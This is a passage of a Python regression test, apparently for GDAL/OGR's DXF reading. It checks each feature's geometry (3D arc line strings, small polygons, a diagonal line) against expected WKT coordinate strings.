#5.87938524157182 -3.31595971334866 -3.31595971334866e-16,5.8270909152852 -3.1865267138484 -3.1865267138484e-16,5.76589518571785 -3.06105687442822 -3.06105687442822e-16,5.69609619231285 -2.94016147153359 -2.94016147153359e-16,5.61803398874989 -2.82442949541505 -2.82442949541505e-16,5.53208888623796 -2.71442478062692 -2.71442478062692e-16,5.4386796006773 -2.61068325908201 -2.61068325908201e-16,5.33826121271772 -2.51371034904521 -2.51371034904521e-16,5.23132295065132 -2.42397849278656 -2.42397849278656e-16,5.11838580694149 -2.34192485488992 -2.34192485488992e-16,5.0 -2.26794919243112 -2.26794919243112e-16,4.87674229357816 -2.20241190740167 -2.20241190740167e-16,4.74921318683182 -2.14563229086643 -2.14563229086643e-16,4.61803398874989 -2.09788696740969 -2.09788696740969e-16,4.48384379119934 -2.05940854744801 -2.05940854744801e-16,4.34729635533386 -2.03038449397558 -2.03038449397558e-16,4.20905692653531 -2.01095620926345 -2.01095620926345e-16,4.069798993405 -2.00121834596181 -2.00121834596181e-16,3.930201006595 -2.00121834596181 -2.00121834596181e-16,3.79094307346469 -2.01095620926345 -2.01095620926345e-16,3.65270364466614 -2.03038449397558 -2.03038449397558e-16,3.51615620880067 -2.05940854744801 -2.05940854744801e-16,3.38196601125011 -2.09788696740969 -2.09788696740969e-16,3.25078681316818 -2.14563229086643 -2.14563229086643e-16,3.12325770642185 -2.20241190740167 -2.20241190740167e-16,3.0 -2.26794919243112 -2.26794919243112e-16,2.88161419305851 -2.34192485488992 -2.34192485488992e-16,2.76867704934868 -2.42397849278656 -2.42397849278656e-16,2.66173878728228 -2.51371034904521 -2.51371034904521e-16,2.5613203993227 -2.610683259082 -2.610683259082e-16,2.46791111376204 -2.71442478062692 -2.71442478062692e-16,2.38196601125011 -2.82442949541505 -2.82442949541505e-16,2.30390380768715 -2.94016147153359 -2.94016147153359e-16,2.23410481428215 -3.06105687442822 -3.06105687442822e-16,2.1729090847148 -3.1865267138484 -3.1865267138484e-16,2.12061475842818 -3.31595971334866 -3.31595971334866e-16,2.07747660812336 -3.448725288366 -3.448725288366e-16,2.04370479853239 -3.58417661836448 -3.58417661836448e-16,2.01946386251686 -3.72165379807987 -3.72165379807987e-16,2.00487189948035 -3.86048705251175 -3.86048705251175e-16,2.0 -4.0 -4e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 -4 -4e-16,2.00487189948035 -4.13951294748825 -4.13951294748825e-16,2.01946386251686 -4.27834620192013 -4.27834620192013e-16,2.04370479853239 -4.41582338163552 -4.41582338163552e-16,2.07747660812336 -4.551274711634 -4.551274711634e-16,2.12061475842818 -4.68404028665134 -4.68404028665134e-16,2.1729090847148 -4.8134732861516 -4.8134732861516e-16,2.23410481428215 -4.93894312557178 -4.93894312557178e-16,2.30390380768715 -5.05983852846641 -5.05983852846641e-16,2.38196601125011 -5.17557050458495 -5.17557050458495e-16,2.46791111376204 -5.28557521937308 -5.28557521937308e-16,2.5613203993227 -5.38931674091799 -5.38931674091799e-16,2.66173878728228 -5.48628965095479 -5.48628965095479e-16,2.76867704934868 -5.57602150721344 -5.57602150721344e-16,2.88161419305851 -5.65807514511008 -5.65807514511008e-16,3.0 -5.73205080756888 -5.73205080756888e-16,3.12325770642185 -5.79758809259833 -5.79758809259833e-16,3.25078681316818 -5.85436770913357 -5.85436770913357e-16,3.38196601125011 -5.90211303259031 -5.90211303259031e-16,3.51615620880066 -5.94059145255199 -5.94059145255199e-16,3.65270364466614 -5.96961550602442 -5.96961550602442e-16,3.79094307346469 -5.98904379073655 -5.98904379073655e-16,3.930201006595 -5.99878165403819 -5.99878165403819e-16,4.069798993405 -5.99878165403819 -5.99878165403819e-16,4.20905692653531 -5.98904379073655 -5.98904379073655e-16,4.34729635533386 -5.96961550602442 -5.96961550602442e-16,4.48384379119934 -5.94059145255199 -5.94059145255199e-16,4.61803398874989 -5.90211303259031 -5.90211303259031e-16,4.74921318683182 -5.85436770913357 -5.85436770913357e-16,4.87674229357815 -5.79758809259833 -5.79758809259833e-16,5.0 -5.73205080756888 -5.73205080756888e-16,5.11838580694149 -5.65807514511008 -5.65807514511008e-16,5.23132295065132 -5.57602150721344 -5.57602150721344e-16,5.33826121271772 -5.48628965095479 -5.48628965095479e-16,5.4386796006773 -5.38931674091799 -5.38931674091799e-16,5.53208888623796 -5.28557521937308 -5.28557521937308e-16,5.61803398874989 -5.17557050458495 -5.17557050458495e-16,5.69609619231285 -5.05983852846641 -5.05983852846641e-16,5.76589518571785 -4.93894312557178 -4.93894312557178e-16,5.8270909152852 -4.8134732861516 -4.8134732861516e-16,5.87938524157182 -4.68404028665134 -4.68404028665134e-16,5.92252339187664 -4.551274711634 -4.551274711634e-16,5.95629520146761 -4.41582338163552 -4.41582338163552e-16,5.98053613748314 -4.27834620192013 -4.27834620192013e-16,5.99512810051965 -4.13951294748825 -4.13951294748825e-16,6 -4 -4e-16,5.99512810051965 -3.86048705251175 -3.86048705251175e-16,5.98053613748314 -3.72165379807987 -3.72165379807987e-16,5.95629520146761 -3.58417661836448 -3.58417661836448e-16,5.92252339187664 -3.448725288366 -3.448725288366e-16,5.87938524157182 -3.31595971334866 -3.31595971334866e-16,5.8270909152852 -3.1865267138484 -3.1865267138484e-16,5.76589518571785 -3.06105687442822 -3.06105687442822e-16,5.69609619231285 -2.94016147153359 -2.94016147153359e-16,5.61803398874989 -2.82442949541505 -2.82442949541505e-16,5.53208888623796 -2.71442478062692 -2.71442478062692e-16,5.4386796006773 -2.61068325908201 -2.61068325908201e-16,5.33826121271772 -2.51371034904521 -2.51371034904521e-16,' + \
'5.23132295065132 -2.42397849278656 -2.42397849278656e-16,5.11838580694149 -2.34192485488992 -2.34192485488992e-16,5.0 -2.26794919243112 -2.26794919243112e-16,4.87674229357816 -2.20241190740167 -2.20241190740167e-16,4.74921318683182 -2.14563229086643 -2.14563229086643e-16,4.61803398874989 -2.09788696740969 -2.09788696740969e-16,4.48384379119934 -2.05940854744801 -2.05940854744801e-16,4.34729635533386 -2.03038449397558 -2.03038449397558e-16,4.20905692653531 -2.01095620926345 -2.01095620926345e-16,4.069798993405 -2.00121834596181 -2.00121834596181e-16,3.930201006595 -2.00121834596181 -2.00121834596181e-16,3.79094307346469 -2.01095620926345 -2.01095620926345e-16,3.65270364466614 -2.03038449397558 -2.03038449397558e-16,3.51615620880067 -2.05940854744801 -2.05940854744801e-16,3.38196601125011 -2.09788696740969 -2.09788696740969e-16,3.25078681316818 -2.14563229086643 -2.14563229086643e-16,3.12325770642185 -2.20241190740167 -2.20241190740167e-16,3.0 -2.26794919243112 -2.26794919243112e-16,2.88161419305851 -2.34192485488992 -2.34192485488992e-16,2.76867704934868 -2.42397849278656 -2.42397849278656e-16,2.66173878728228 -2.51371034904521 -2.51371034904521e-16,2.5613203993227 -2.610683259082 -2.610683259082e-16,2.46791111376204 -2.71442478062692 -2.71442478062692e-16,2.38196601125011 -2.82442949541505 -2.82442949541505e-16,2.30390380768715 -2.94016147153359 -2.94016147153359e-16,2.23410481428215 -3.06105687442822 -3.06105687442822e-16,2.1729090847148 -3.1865267138484 -3.1865267138484e-16,2.12061475842818 -3.31595971334866 -3.31595971334866e-16,2.07747660812336 -3.448725288366 -3.448725288366e-16,2.04370479853239 -3.58417661836448 -3.58417661836448e-16,2.01946386251686 -3.72165379807987 -3.72165379807987e-16,2.00487189948035 -3.86048705251175 -3.86048705251175e-16,2.0 -4.0 -4e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):44
# EntityHandle (String) = 230
# LINESTRING Z (2 -4 -5e-16,2.00487189948035 -4.06975647374412 -5.06975647374413e-16,2.01946386251686 -4.13917310096007 -5.13917310096007e-16,2.04370479853239 -4.20791169081776 -5.20791169081776e-16,2.07747660812336 -4.275637355817 -5.275637355817e-16,2.12061475842818 -4.34202014332567 -5.34202014332567e-16,2.1729090847148 -4.4067366430758 -5.4067366430758e-16,2.23410481428215 -4.46947156278589 -5.46947156278589e-16,2.30390380768715 -4.52991926423321 -5.52991926423321e-16,2.38196601125011 -4.58778525229247 -5.58778525229247e-16,2.46791111376204 -4.64278760968654 -5.64278760968654e-16,2.5613203993227 -4.694658370459 -5.694658370459e-16,2.66173878728228 -4.74314482547739 -5.7431448254774e-16,2.76867704934868 -4.78801075360672 -5.78801075360672e-16,2.88161419305851 -4.82903757255504 -5.82903757255504e-16,3.0 -4.86602540378444 -5.86602540378444e-16,3.12325770642185 -4.89879404629917 -5.89879404629917e-16,3.25078681316818 -4.92718385456679 -5.92718385456679e-16,3.38196601125011 -4.95105651629515 -5.95105651629515e-16,3.51615620880067 -4.970295726276 -5.970295726276e-16,3.65270364466614 -4.98480775301221 -5.98480775301221e-16,3.79094307346469 -4.99452189536827 -5.99452189536827e-16,3.930201006595 -4.9993908270191 -5.9993908270191e-16,4.069798993405 -4.9993908270191 -5.9993908270191e-16,4.20905692653531 -4.99452189536827 -5.99452189536827e-16,4.34729635533386 -4.98480775301221 -5.98480775301221e-16,4.48384379119934 -4.970295726276 -5.970295726276e-16,4.61803398874989 -4.95105651629515 -5.95105651629515e-16,4.74921318683182 -4.92718385456679 -5.92718385456679e-16,4.87674229357816 -4.89879404629917 -5.89879404629917e-16,5.0 -4.86602540378444 -5.86602540378444e-16,5.11838580694149 -4.82903757255504 -5.82903757255504e-16,5.23132295065132 -4.78801075360672 -5.78801075360672e-16,5.33826121271772 -4.74314482547739 -5.74314482547739e-16,5.4386796006773 -4.694658370459 -5.694658370459e-16,5.53208888623796 -4.64278760968654 -5.64278760968654e-16,5.61803398874989 -4.58778525229247 -5.58778525229247e-16,5.69609619231285 -4.5299192642332 -5.52991926423321e-16,5.76589518571785 -4.46947156278589 -5.46947156278589e-16,5.8270909152852 -4.4067366430758 -5.4067366430758e-16,5.87938524157182 -4.34202014332567 -5.34202014332567e-16,5.92252339187664 -4.275637355817 -5.275637355817e-16,5.95629520146761 -4.20791169081776 -5.20791169081776e-16,5.98053613748314 -4.13917310096007 -5.13917310096007e-16,5.99512810051965 -4.06975647374412 -5.06975647374413e-16,6 -4 -5e-16,5.99512810051965 -3.93024352625587 -4.93024352625588e-16,5.98053613748314 -3.86082689903993 -4.86082689903993e-16,5.95629520146761 -3.79208830918224 -4.79208830918224e-16,5.92252339187664 -3.724362644183 -4.724362644183e-16,5.87938524157182 -3.65797985667433 -4.65797985667433e-16,5.8270909152852 -3.5932633569242 -4.5932633569242e-16,5.76589518571785 -3.53052843721411 -4.53052843721411e-16,
#5.69609619231285 -3.4700807357668 -4.4700807357668e-16,5.61803398874989 -3.41221474770753 -4.41221474770753e-16,5.53208888623796 -3.35721239031346 -4.35721239031346e-16,5.4386796006773 -3.305341629541 -4.305341629541e-16,5.33826121271772 -3.25685517452261 -4.25685517452261e-16,5.23132295065132 -3.21198924639328 -4.21198924639328e-16,5.11838580694149 -3.17096242744496 -4.17096242744496e-16,5.0 -3.13397459621556 -4.13397459621556e-16,4.87674229357815 -3.10120595370083 -4.10120595370083e-16,4.74921318683182 -3.07281614543321 -4.07281614543321e-16,4.61803398874989 -3.04894348370485 -4.04894348370485e-16,4.48384379119934 -3.029704273724 -4.029704273724e-16,4.34729635533386 -3.01519224698779 -4.01519224698779e-16,4.20905692653531 -3.00547810463173 -4.00547810463173e-16,4.069798993405 -3.0006091729809 -4.0006091729809e-16,3.930201006595 -3.0006091729809 -4.0006091729809e-16,3.79094307346469 -3.00547810463173 -4.00547810463173e-16,3.65270364466614 -3.01519224698779 -4.01519224698779e-16,3.51615620880066 -3.029704273724 -4.029704273724e-16,3.38196601125011 -3.04894348370485 -4.04894348370485e-16,3.25078681316818 -3.07281614543321 -4.07281614543321e-16,3.12325770642185 -3.10120595370083 -4.10120595370083e-16,3.0 -3.13397459621556 -4.13397459621556e-16,2.88161419305851 -3.17096242744496 -4.17096242744496e-16,2.76867704934868 -3.21198924639328 -4.21198924639328e-16,2.66173878728228 -3.25685517452261 -4.25685517452261e-16,2.5613203993227 -3.305341629541 -4.305341629541e-16,2.46791111376204 -3.35721239031346 -4.35721239031346e-16,2.38196601125011 -3.41221474770753 -4.41221474770753e-16,2.30390380768715 -3.4700807357668 -4.4700807357668e-16,2.23410481428215 -3.53052843721411 -4.53052843721411e-16,2.1729090847148 -3.5932633569242 -4.5932633569242e-16,2.12061475842818 -3.65797985667433 -4.65797985667433e-16,2.07747660812336 -3.724362644183 -4.724362644183e-16,2.04370479853239 -3.79208830918224 -4.79208830918224e-16,2.01946386251686 -3.86082689903993 -4.86082689903993e-16,2.00487189948035 -3.93024352625587 -4.93024352625588e-16,2 -4 -5e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 -4 -5e-16,2.00487189948035 -4.06975647374412 -5.06975647374413e-16,2.01946386251686 -4.13917310096007 -5.13917310096007e-16,2.04370479853239 -4.20791169081776 -5.20791169081776e-16,2.07747660812336 -4.275637355817 -5.275637355817e-16,2.12061475842818 -4.34202014332567 -5.34202014332567e-16,2.1729090847148 -4.4067366430758 -5.4067366430758e-16,2.23410481428215 -4.46947156278589 -5.46947156278589e-16,2.30390380768715 -4.52991926423321 -5.52991926423321e-16,2.38196601125011 -4.58778525229247 -5.58778525229247e-16,2.46791111376204 -4.64278760968654 -5.64278760968654e-16,2.5613203993227 -4.694658370459 -5.694658370459e-16,2.66173878728228 -4.74314482547739 -5.7431448254774e-16,2.76867704934868 -4.78801075360672 -5.78801075360672e-16,2.88161419305851 -4.82903757255504 -5.82903757255504e-16,3.0 -4.86602540378444 -5.86602540378444e-16,3.12325770642185 -4.89879404629917 -5.89879404629917e-16,3.25078681316818 -4.92718385456679 -5.92718385456679e-16,3.38196601125011 -4.95105651629515 -5.95105651629515e-16,3.51615620880067 -4.970295726276 -5.970295726276e-16,3.65270364466614 -4.98480775301221 -5.98480775301221e-16,3.79094307346469 -4.99452189536827 -5.99452189536827e-16,3.930201006595 -4.9993908270191 -5.9993908270191e-16,4.069798993405 -4.9993908270191 -5.9993908270191e-16,4.20905692653531 -4.99452189536827 -5.99452189536827e-16,4.34729635533386 -4.98480775301221 -5.98480775301221e-16,4.48384379119934 -4.970295726276 -5.970295726276e-16,4.61803398874989 -4.95105651629515 -5.95105651629515e-16,4.74921318683182 -4.92718385456679 -5.92718385456679e-16,4.87674229357816 -4.89879404629917 -5.89879404629917e-16,5.0 -4.86602540378444 -5.86602540378444e-16,5.11838580694149 -4.82903757255504 -5.82903757255504e-16,5.23132295065132 -4.78801075360672 -5.78801075360672e-16,5.33826121271772 -4.74314482547739 -5.74314482547739e-16,5.4386796006773 -4.694658370459 -5.694658370459e-16,5.53208888623796 -4.64278760968654 -5.64278760968654e-16,5.61803398874989 -4.58778525229247 -5.58778525229247e-16,5.69609619231285 -4.5299192642332 -5.52991926423321e-16,5.76589518571785 -4.46947156278589 -5.46947156278589e-16,5.8270909152852 -4.4067366430758 -5.4067366430758e-16,5.87938524157182 -4.34202014332567 -5.34202014332567e-16,5.92252339187664 -4.275637355817 -5.275637355817e-16,5.95629520146761 -4.20791169081776 -5.20791169081776e-16,5.98053613748314 -4.13917310096007 -5.13917310096007e-16,5.99512810051965 -4.06975647374412 -5.06975647374413e-16,6 -4 -5e-16,5.99512810051965 -3.93024352625587 -4.93024352625588e-16,5.98053613748314 -3.86082689903993 -4.86082689903993e-16,5.95629520146761 -3.79208830918224 -4.79208830918224e-16,5.92252339187664 -3.724362644183 -4.724362644183e-16,5.87938524157182 -3.65797985667433 -4.65797985667433e-16,5.8270909152852 -3.5932633569242 -4.5932633569242e-16,5.76589518571785 -3.53052843721411 -4.53052843721411e-16,5.69609619231285 -3.4700807357668 -4.4700807357668e-16,5.61803398874989 -3.41221474770753 -4.41221474770753e-16,' + \
'5.53208888623796 -3.35721239031346 -4.35721239031346e-16,5.4386796006773 -3.305341629541 -4.305341629541e-16,5.33826121271772 -3.25685517452261 -4.25685517452261e-16,5.23132295065132 -3.21198924639328 -4.21198924639328e-16,5.11838580694149 -3.17096242744496 -4.17096242744496e-16,5.0 -3.13397459621556 -4.13397459621556e-16,4.87674229357815 -3.10120595370083 -4.10120595370083e-16,4.74921318683182 -3.07281614543321 -4.07281614543321e-16,4.61803398874989 -3.04894348370485 -4.04894348370485e-16,4.48384379119934 -3.029704273724 -4.029704273724e-16,4.34729635533386 -3.01519224698779 -4.01519224698779e-16,4.20905692653531 -3.00547810463173 -4.00547810463173e-16,4.069798993405 -3.0006091729809 -4.0006091729809e-16,3.930201006595 -3.0006091729809 -4.0006091729809e-16,3.79094307346469 -3.00547810463173 -4.00547810463173e-16,3.65270364466614 -3.01519224698779 -4.01519224698779e-16,3.51615620880066 -3.029704273724 -4.029704273724e-16,3.38196601125011 -3.04894348370485 -4.04894348370485e-16,3.25078681316818 -3.07281614543321 -4.07281614543321e-16,3.12325770642185 -3.10120595370083 -4.10120595370083e-16,3.0 -3.13397459621556 -4.13397459621556e-16,2.88161419305851 -3.17096242744496 -4.17096242744496e-16,2.76867704934868 -3.21198924639328 -4.21198924639328e-16,2.66173878728228 -3.25685517452261 -4.25685517452261e-16,2.5613203993227 -3.305341629541 -4.305341629541e-16,2.46791111376204 -3.35721239031346 -4.35721239031346e-16,2.38196601125011 -3.41221474770753 -4.41221474770753e-16,2.30390380768715 -3.4700807357668 -4.4700807357668e-16,2.23410481428215 -3.53052843721411 -4.53052843721411e-16,2.1729090847148 -3.5932633569242 -4.5932633569242e-16,2.12061475842818 -3.65797985667433 -4.65797985667433e-16,2.07747660812336 -3.724362644183 -4.724362644183e-16,2.04370479853239 -3.79208830918224 -4.79208830918224e-16,2.01946386251686 -3.86082689903993 -4.86082689903993e-16,2.00487189948035 -3.93024352625587 -4.93024352625588e-16,2 -4 -5e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):45
# EntityHandle (String) = 231
# LINESTRING Z (2 -2 -2e-16,1.96657794502105 -2.03582232791524 -2.03582232791524e-16,1.93571660708646 -2.07387296203834 -2.07387296203834e-16,1.90756413746468 -2.11396923855472 -2.11396923855472e-16,1.88225568337755 -2.15591867344963 -2.15591867344963e-16,1.85991273921989 -2.19951988653655 -2.19951988653655e-16,1.84064256332004 -2.24456356819194 -2.24456356819194e-16,1.8245376630414 -2.29083348415575 -2.29083348415575e-16,1.81167535069652 -2.33810751357387 -2.33810751357387e-16,1.80211737240583 -2.38615871529951 -2.38615871529951e-16,1.79590961168258 -2.43475641733454 -2.43475641733454e-16,1.79308186916688 -2.48366732418105 -2.48366732418105e-16,1.79364771956639 -2.53265663678705 -2.53265663678705e-16,1.79760444649032 -2.58148917971011 -2.58148917971011e-16,1.80493305548955 -2.62993053008786 -2.62993053008786e-16,1.81559836524041 -2.67774814299567 -2.67774814299567e-16,1.8295491764342 -2.72471246778926 -2.72471246778926e-16,1.84671851756181 -2.7705980500731 -2.7705980500731e-16,1.86702396641357 -2.81518461400453 -2.81518461400453e-16,1.89036804575079 -2.85825811973811 -2.85825811973811e-16,1.91663869124976 -2.89961179093367 -2.89961179093367e-16,1.94570978947168 -2.93904710739563 -2.93904710739563e-16,1.97744178327594 -2.97637475807832 -2.97637475807832e-16,2.01168234177068 -3.01141554988232 -3.01141554988232e-16,2.04826709158413 -3.04400126787917 -3.04400126787917e-16,2.08702040594658 -3.07397548283483 -3.07397548283483e-16,2.12775624779472 -3.10119430215541 -3.10119430215541e-16,2.1702790628511 -3.12552706065018 -3.12552706065018e-16,2.2143847183914 -3.14685694779575 -3.14685694779575e-16,2.25986148319297 -3.16508156849045 -3.16508156849045e-16,2.30649104396024 -3.18011343460661 -3.18011343460661e-16,2.35404955334774 -3.1918803849814 -3.1918803849814e-16,2.40230870454951 -3.20032593182975 -3.20032593182975e-16,2.45103682729644 -3.2054095319166 -3.2054095319166e-16,2.5 -3.20710678118655 -3.20710678118655e-16,2.54896317270356 -3.2054095319166 -3.2054095319166e-16,2.59769129545049 -3.20032593182975 -3.20032593182975e-16,2.64595044665226 -3.1918803849814 -3.1918803849814e-16,2.69350895603976 -3.18011343460661 -3.18011343460661e-16,2.74013851680703 -3.16508156849045 -3.16508156849045e-16,2.7856152816086 -3.14685694779575 -3.14685694779575e-16,2.8297209371489 -3.12552706065018 -3.12552706065018e-16,2.87224375220528 -3.10119430215541 -3.10119430215541e-16,2.91297959405342 -3.07397548283483 -3.07397548283483e-16,2.95173290841587 -3.04400126787917 -3.04400126787917e-16,2.98831765822932 -3.01141554988232 -3.01141554988232e-16,3.02255821672406 -2.97637475807832 -2.97637475807832e-16,3.05429021052832 -2.93904710739563 -2.93904710739563e-16,3.08336130875024 -2.89961179093367 -2.89961179093367e-16,3.10963195424921 -2.85825811973811 -2.85825811973811e-16,3.13297603358643 -2.81518461400453 -2.81518461400453e-16,3.15328148243819 -2.7705980500731 -2.7705980500731e-16,3.1704508235658 -2.72471246778926 -2.72471246778926e-16,3.18440163475959 -2.67774814299567 -2.67774814299567e-16,3.19506694451045 -2.62993053008786 -2.62993053008786e-16,3.20239555350968 -2.58148917971011 -2.58148917971011e-16,3.20635228043361 -2.53265663678705 -2.53265663678705e-16,3.20691813083312 -2.48366732418105 -2.48366732418105e-16,3.20409038831742 -2.43475641733454 -2.43475641733454e-16,3.19788262759417 -2.38615871529951 -2.38615871529951e-16,3.18832464930348 -2.33810751357387 -2.33810751357387e-16,3.1754623369586 -2.29083348415575 -2.29083348415575e-16,3.15935743667996 -2.24456356819194 -2.24456356819194e-16,3.14008726078011 -2.19951988653655 -2.19951988653655e-16,3.11774431662245 -2.15591867344963 -2.15591867344963e-16,3.09243586253532 -2.11396923855472 -2.11396923855471e-16,3.06428339291354 -2.07387296203834 -2.07387296203834e-16,3.03342205497895 -2.03582232791524 -2.03582232791524e-16,3 -2 -2e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 -2 -2e-16,1.96657794502105 -2.03582232791524 -2.03582232791524e-16,1.93571660708646 -2.07387296203834 -2.07387296203834e-16,1.90756413746468 -2.11396923855472 -2.11396923855472e-16,1.88225568337755 -2.15591867344963 -2.15591867344963e-16,1.85991273921989 -2.19951988653655 -2.19951988653655e-16,1.84064256332004 -2.24456356819194 -2.24456356819194e-16,1.8245376630414 -2.29083348415575 -2.29083348415575e-16,1.81167535069652 -2.33810751357387 -2.33810751357387e-16,1.80211737240583 -2.38615871529951 -2.38615871529951e-16,1.79590961168258 -2.43475641733454 -2.43475641733454e-16,1.79308186916688 -2.48366732418105 -2.48366732418105e-16,1.79364771956639 -2.53265663678705 -2.53265663678705e-16,1.79760444649032 -2.58148917971011 -2.58148917971011e-16,1.80493305548955 -2.62993053008786 -2.62993053008786e-16,1.81559836524041 -2.67774814299567 -2.67774814299567e-16,1.8295491764342 -2.72471246778926 -2.72471246778926e-16,1.84671851756181 -2.7705980500731 -2.7705980500731e-16,1.86702396641357 -2.81518461400453 -2.81518461400453e-16,1.89036804575079 -2.85825811973811 -2.85825811973811e-16,1.91663869124976 -2.89961179093367 -2.89961179093367e-16,1.94570978947168 -2.93904710739563 -2.93904710739563e-16,1.97744178327594 -2.97637475807832 -2.97637475807832e-16,2.01168234177068 -3.01141554988232 -3.01141554988232e-16,2.04826709158413 -3.04400126787917 -3.04400126787917e-16,2.08702040594658 -3.07397548283483 -3.07397548283483e-16,2.12775624779472 -3.10119430215541 -3.10119430215541e-16,2.1702790628511 -3.12552706065018 -3.12552706065018e-16,2.2143847183914 -3.14685694779575 -3.14685694779575e-16,2.25986148319297 -3.16508156849045 -3.16508156849045e-16,2.30649104396024 -3.18011343460661 -3.18011343460661e-16,2.35404955334774 -3.1918803849814 -3.1918803849814e-16,2.40230870454951 -3.20032593182975 -3.20032593182975e-16,2.45103682729644 -3.2054095319166 -3.2054095319166e-16,2.5 -3.20710678118655 -3.20710678118655e-16,2.54896317270356 -3.2054095319166 -3.2054095319166e-16,2.59769129545049 -3.20032593182975 -3.20032593182975e-16,2.64595044665226 -3.1918803849814 -3.1918803849814e-16,2.69350895603976 -3.18011343460661 -3.18011343460661e-16,2.74013851680703 -3.16508156849045 -3.16508156849045e-16,2.7856152816086 -3.14685694779575 -3.14685694779575e-16,2.8297209371489 -3.12552706065018 -3.12552706065018e-16,2.87224375220528 -3.10119430215541 -3.10119430215541e-16,2.91297959405342 -3.07397548283483 -3.07397548283483e-16,2.95173290841587 -3.04400126787917 -3.04400126787917e-16,2.98831765822932 -3.01141554988232 -3.01141554988232e-16,3.02255821672406 -2.97637475807832 -2.97637475807832e-16,3.05429021052832 -2.93904710739563 -2.93904710739563e-16,3.08336130875024 -2.89961179093367 -2.89961179093367e-16,3.10963195424921 -2.85825811973811 -2.85825811973811e-16,3.13297603358643 -2.81518461400453 -2.81518461400453e-16,3.15328148243819 -2.7705980500731 -2.7705980500731e-16,3.1704508235658 -2.72471246778926 -2.72471246778926e-16,3.18440163475959 -2.67774814299567 -2.67774814299567e-16,3.19506694451045 -2.62993053008786 -2.62993053008786e-16,3.20239555350968 -2.58148917971011 -2.58148917971011e-16,3.20635228043361 -2.53265663678705 -2.53265663678705e-16,3.20691813083312 -2.48366732418105 -2.48366732418105e-16,3.20409038831742 -2.43475641733454 -2.43475641733454e-16,3.19788262759417 -2.38615871529951 -2.38615871529951e-16,3.18832464930348 -2.33810751357387 -2.33810751357387e-16,3.1754623369586 -2.29083348415575 -2.29083348415575e-16,3.15935743667996 -2.24456356819194 -2.24456356819194e-16,3.14008726078011 -2.19951988653655 -2.19951988653655e-16,3.11774431662245 -2.15591867344963 -2.15591867344963e-16,3.09243586253532 -2.11396923855472 -2.11396923855471e-16,3.06428339291354 -2.07387296203834 -2.07387296203834e-16,3.03342205497895 -2.03582232791524 -2.03582232791524e-16,3 -2 -2e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):46
# EntityHandle (String) = 232
# POLYGON Z ((1 -2 -2e-16,1 -3 -4e-16,2 -3 -4e-16,2 -2 -2e-16,1 -2 -2e-16))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1 -2 -2e-16,1 -3 -4e-16,2 -3 -4e-16,2 -2 -2e-16,1 -2 -2e-16))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):47
# EntityHandle (String) = 233
# POLYGON ((3 -4,4 -4,4 -3,3 -3,3 -4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((3 -4,4 -4,4 -3,3 -3,3 -4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):48
# EntityHandle (String) = 235
# POLYGON ((8 -8,9 -8,9 -9,8 -9,8 -8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((8 -8,9 -8,9 -9,8 -9,8 -8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):49
# EntityHandle (String) = 236
# LINESTRING (2 -2,2.15384615384615 -2.15384615384615,2.30769230769231 -2.30769230769231,2.46153846153846 -2.46153846153846,2.61538461538461 -2.61538461538461,2.76923076923077 -2.76923076923077,2.92307692307692 -2.92307692307692,3.07692307692308 -3.07692307692308,3.23076923076923 -3.23076923076923,3.38461538461538 -3.38461538461538,3.53846153846154 -3.53846153846154,3.69230769230769 -3.69230769230769,3.84615384615385 -3.84615384615385,4 -4,4.15384615384615 -4.15384615384615,4.30769230769231 -4.30769230769231,4.46153846153846 -4.46153846153846,4.61538461538462 -4.61538461538462,4.76923076923077 -4.76923076923077,4.92307692307692 -4.92307692307692,5.07692307692308 -5.07692307692308,5.23076923076923 -5.23076923076923,5.38461538461538 -5.38461538461538,5.53846153846154 -5.53846153846154,5.69230769230769 -5.69230769230769,5.84615384615385 -5.84615384615385,6.0 -6.0,6.15384615384615 -6.15384615384615,6.30769230769231 -6.30769230769231,6.46153846153846 -6.46153846153846,6.61538461538462 -6.61538461538462,6.76923076923077 -6.76923076923077,6.92307692307692 -6.92307692307692,7.07692307692308 -7.07692307692308,7.23076923076923 -7.23076923076923,7.38461538461539 -7.38461538461539,7.53846153846154 -7.53846153846154,7.69230769230769 -7.69230769230769,7.84615384615385 -7.84615384615385,8 -8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 -2,2.15384615384615 -2.15384615384615,2.30769230769231 -2.30769230769231,2.46153846153846 -2.46153846153846,2.61538461538461 -2.61538461538461,2.76923076923077 -2.76923076923077,2.92307692307692 -2.92307692307692,3.07692307692308 -3.07692307692308,3.23076923076923 -3.23076923076923,3.38461538461538 -3.38461538461538,3.53846153846154 -3.53846153846154,3.69230769230769 -3.69230769230769,3.84615384615385 -3.84615384615385,4 -4,4.15384615384615 -4.15384615384615,4.30769230769231 -4.30769230769231,4.46153846153846 -4.46153846153846,4.61538461538462 -4.61538461538462,4.76923076923077 -4.76923076923077,4.92307692307692 -4.92307692307692,5.07692307692308 -5.07692307692308,5.23076923076923 -5.23076923076923,5.38461538461538 -5.38461538461538,5.53846153846154 -5.53846153846154,5.69230769230769 -5.69230769230769,5.84615384615385 -5.84615384615385,6.0 -6.0,6.15384615384615 -6.15384615384615,6.30769230769231 -6.30769230769231,6.46153846153846 -6.46153846153846,6.61538461538462 -6.61538461538462,6.76923076923077 -6.76923076923077,6.92307692307692 -6.92307692307692,7.07692307692308 -7.07692307692308,7.23076923076923 -7.23076923076923,7.38461538461539 -7.38461538461539,7.53846153846154 -7.53846153846154,7.69230769230769 -7.69230769230769,7.84615384615385 -7.84615384615385,8 -8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):50
# EntityHandle (String) = 237
